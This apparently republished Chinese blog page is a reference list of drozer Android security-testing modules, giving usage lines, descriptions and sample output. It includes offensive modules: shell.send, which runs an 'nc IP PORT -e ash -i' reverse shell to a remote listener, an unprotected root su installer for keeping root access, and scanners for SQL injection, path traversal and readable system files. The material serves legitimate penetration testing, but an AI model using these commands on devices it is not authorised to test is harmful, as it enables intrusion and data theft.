Drozer模块命令大全(二)
来源:互联网 发布:淘宝店招页头尺寸 编辑:程序博客网 时间:2024/05/22 05:02
目录
- 目录
- 模块列表
模块列表
auxiliary.webcontentresolver
usage: run auxiliary.webcontentresolver [-h] [-p PORT]
开启一个web服务,可以和手机上的content provider连接,还可以和sqlmap联合使用。
Examples:
dz> run auxiliary.webcontentresolver –port 8080
WebContentResolver started on port 8080.Ctrl+C to StopLast Modified: 2012-11-06
Credit: Nils (@mwrlabs)
License: BSD (3 clause)
optional arguments:
exploit.jdwp.check
usage: run exploit.jdwp.check [-h]
这个模块针对一个漏洞,安卓2.3版本可调试的app都会去寻找一个叫@jdwp-control的UNIX套接字。
Examples:
dz> run exploit.jdwp.check
[+] Opened @jdwp-control
[*] Accepting connections
[+] com.mwr.dz connected!
[+] Received PID = 4931
[+] This device is vulnerable!
[+] com.mwr.dz connected!
[+] Received PID = 4940
[+] This device is vulnerable!
Last Modified: 2014-07-29
Credit: Tyrone (@mwrlabs)
License: BSD (3 clause)
optional arguments:
-h, –help
exploit.pilfer.general.apnprovider
usage: run exploit.pilfer.general.apnprovider [-h]
获取APN信息, APN,全写是Access Point Name,即“接入点名称”,是您在通过手机上网时必须配置的一个参数,它决定了您的手机通过哪种接入方式来访问网络。
The target provider is content://telephony/carriers/preferapn
Examples:
dz> run exploit.pilfer.general.apnprovider
_id 1
name T-Mobile US
numeric 310260
mcc 310
mnc 260
apn epc.tmobile.com
… …
Last Modified: 2012-11-06
Credit: Rob (@mwrlabs)
License: BSD (3 clause)
optional arguments:
-h, –help
exploit.pilfer.general.settingsprovider
usage: run exploit.pilfer.general.settingsprovider [-h]
查看系统设置
Last Modified: 2012-11-06
Credit: Tyrone (@mwrlabs)
License: BSD (3 clause)
optional arguments:
-h, –help
information.datetime
usage: run information.datetime [-h]
查看安卓设备的时间
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
optional arguments:
-h, –help
information.deviceinfo
usage: run information.deviceinfo [-h]
获取设备详细信息
Last Modified: 2012-11-06
Credit: Tyrone (@mwrlabs)
License: BSD (3 clause)
optional arguments:
-h, –help
information.permissions
usage: run information.permissions [-h] [–permission PERMISSION] [–protectionlevel PROTECTIONLEVEL]
列出所有手机应用使用过的权限信息。
Examples:
dz> run information.permissions –permission android.permission.INSTALL_PACKAGES
Allows the app to install new or updated Android packages. Malicious apps may use this to add new apps with arbitrarily
powerful permissions.
18 - signature|system
Last Modified: 2014-06-17
Credit: Tyrone (@mwrlabs)
License: BSD (3 clause)
optional arguments:
scanner.activity.browsable
usage: run scanner.activity.browsable [-a] [–package PACKAGE ][-f] [–filter FILTER ]
找出所有可浏览的activity
Package: com.android.contacts
Invocable URIs:
tel://
Classes:
.activities.PeopleActivity
com.android.contacts.NonPhoneActivity
Package: com.android.calendar
Invocable URIs:
http://www.google.com/calendar/event (PATTERN_PREFIX)
Classes:
GoogleCalendarUriIntentFilter
Package: com.android.browser
Invocable URIs:
http://
Classes:
BrowserActivity
Package: com.android.music
Invocable URIs:
http://
content://
Classes:
AudioPreview
Package: com.android.mms
Invocable URIs:
sms://
mms://
Classes:
.ui.ComposeMessageActivity
Last Modified: 2014-10-31
Credit: Tyrone (@mwrlabs)
License: BSD (3-clause)
optional arguments:
scanner.misc.native
usage: run scanner.misc.native [-h] [-a PACKAGE] [-f FILTER] [-v]
列出包含native的包
注意: 只检查包捆绑的lib文件来判断
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
optional arguments:
scanner.misc.readablefiles
usage: run scanner.misc.readablefiles [-h] [-p] target
查找可被其应用读取的文件
Examples:
dz> run scanner.misc.readablefiles /data -p
Discovered world-readable files in /data:
/data/system/packages-stopped.xml
/data/system/packages.list
/data/system/packages.xml
/data/system/uiderrors.txt
……
Last Modified: 2013-04-18
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
positional arguments:
target the target directory to search
optional arguments:
scanner.misc.secretcodes
usage: run scanner.misc.secretcodes [-h] [-v]
查找手机暗码,具体参考:
http://blog.csdn.net/huangjuecheng/article/details/7261211?spm=5176.100239.blogcont61513.10.a86Q5r
Last Modified: 2012-11-06
Credit: Mike (@mwrlabs)
License: BSD (3 clause)
optional arguments:
scanner.misc.writablefiles
usage: run scanner.misc.writablefiles [-h] [-p] target
查找能被其他应用写数据权限的文件
Examples:
dz> run scanner.misc.writablefiles /data –privileged
Discovered world-writable files in /data:
/data/anr/slow00.txt
/data/anr/slow01.txt
……
Last Modified: 2013-04-18
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
positional arguments:
target the target directory to search
optional arguments:
scanner.provider.finduris
usage: run scanner.provider.finduris [-h] [-a PACKAGE]
查找content providers URI链接
Examples:
run scanner.provider.finduris
Last Modified: 2012-11-06
Credit: Luander (luander.r@samsung.com)
License: BSD (3 clause)
optional arguments:
scanner.provider.injection
usage: run scanner.provider.injection [-h] [-a ]
查找SQL注入
Last Modified: 2012-11-06
Credit: Rob (@mwrlabs)
License: BSD (3 clause)
optional arguments:
scanner.provider.sqltables
usage: run scanner.provider.sqltables [-h] [-a ]
Enumerate SQL tables accessible through SQL (projection) Injection vulnerabilities.
Last Modified: 2013-01-23
Credit: Rijnard
License: BSD (3 clause)
optional arguments:
scanner.provider.traversal
usage: run scanner.provider.traversal [-h] [-a ]
查找目录遍历漏洞
Last Modified: 2012-11-06
Credit: Nils (@mwrlabs)
License: BSD (3 clause)
optional arguments:
shell.exec
usage: run shell.exec [-h] command
执行单条shell命令
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
positional arguments:
command the Linux command to execute
optional arguments:
-h, –help
shell.send
usage: run shell.send [-h] ip port
发送ASH shell到远程监听器
This module executes nc IP PORT -e ash -i, using BusyBox. This will send an ASH shell to a netcat listener.
Last Modified: 2013-07-25
Credit: Tyrone (@mwrlabs)
License: BSD (3 clause)
positional arguments:
ip ip address of the remote listener
port port address of the remote listener
optional arguments:
-h, –help
shell.start
usage: run shell.start [-h]
进入shell模式
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
optional arguments:
-h, –help
tools.file.download
usage: run tools.file.download [-h] source destination
从手机设备下载文件到pc
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
positional arguments:
source
destination
optional arguments:
-h, –help
tools.file.md5sum
usage: run tools.file.md5sum [-h] target
md5 Checksum of File
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
positional arguments:
target
optional arguments:
-h, –help
tools.file.size
usage: run tools.file.size [-h] target
获取文件大小
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
positional arguments:
target
optional arguments:
-h, –help
tools.file.upload
usage: run tools.file.upload [-h] source destination
从PC上传文件到设备
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
positional arguments:
source
destination
optional arguments:
-h, –help
tools.setup.busybox
usage: run tools.setup.busybox [-h]
安装Busybox
Busybox provides a number of *nix utilities that are missing from Android. Some modules require Busybox to be installed.
Typically, you require root access to the device to install Busybox. drozer can install it from its restrictive context. You can
then use ‘busybox’ in the when executing shell commands from drozer to use it.
Last Modified: 2012-12-12
Credit: Tyrone (@mwrlabs)
License: BSD (3 clause)
optional arguments:
-h, –help
tools.setup.minimalsu
usage: run tools.setup.minimalsu [-h]
Prepares ‘minimal-su’ binary installation files on the device in order to provide access to a root shell on demand.
安装minimal来可以获取暂时的root权限
This binary provides drozer the ability to maintain access to a root shell on the device after obtaining a temporary root shell
via the use of an exploit. Just type su from a shell to get a root shell.
WARNING: This minimal version of the su binary is completely unprotected, meaning that any application on the device can obtain a
root shell without any user prompting.
Examples:
dz> run tools.setup.minimalsu
[*] Uploaded minimal-su
[*] Uploaded install-minimal-su.sh
[*] chmod 770 /data/data/com.mwr.dz/install-minimal-su.sh
[*] Ready! Execute /data/data/com.mwr.dz/install-minimal-su.sh from root context to install su
…insert root exploit here…
u0_a95@android:/data/data/com.mwr.dz # /data/data/com.mwr.dz/install-minimal-su.sh
Done. You can now use su from a shell.
u0_a95@android:/data/data/com.mwr.dz # exit
u0_a95@android:/data/data/com.mwr.dz $ su
u0_a95@android:/data/data/com.mwr.dz #
Last Modified: 2013-12-12
Credit: Tyrone (@mwrlabs)
License: BSD (3 clause)
optional arguments:
-h, –help
- Drozer模块命令大全(二)
- Drozer模块命令大全(一)
- drozer本地拒绝检测模块
- DOS命令大全(二)
- mysql命令大全(二)
- redis命令大全(二)
- Git 命令大全(二)
- SQL*PLUS命令大全(二)
- Linux命令大全(二)--目录
- DOS命令大全二
- DOS命令大全二
- 使用Drozer进行安全测试(Drozer github上开源项目)
- drozer浅析三:命令实现与交互
- drozer源码学习二:info+scanner
- [Matlab]Matlab命令大全(二)
- ADB命令大全之二
- DOS命令大全系列二
- Drozer二 亲测------测试android应用程序漏洞的安全评估工具---Drozer配置安装篇
- 关于dubbo的提供者(provider)和消费者(custom)异常捕获的问题
- ShareSDK 实现第三方登录
- HDMI支持的视频显示格式
- C# WPF Canvas绘图
- 使用xutil建新建项目,并保存到listView中进行显示
- Drozer模块命令大全(二)
- 将web项目发布到Tomcat 服务器上的三种方法
- 为了生存,北上广深的人到底有多拼?
- shell脚本中如何处理浮点运算
- github 里一些好的demo的记录
- web动画深入理解-requestAnimationFrame方法
- 昨天上线遇到Your session has expired. Please log in.我的解决办法
- spring aop 日志
- Android studio工具介绍
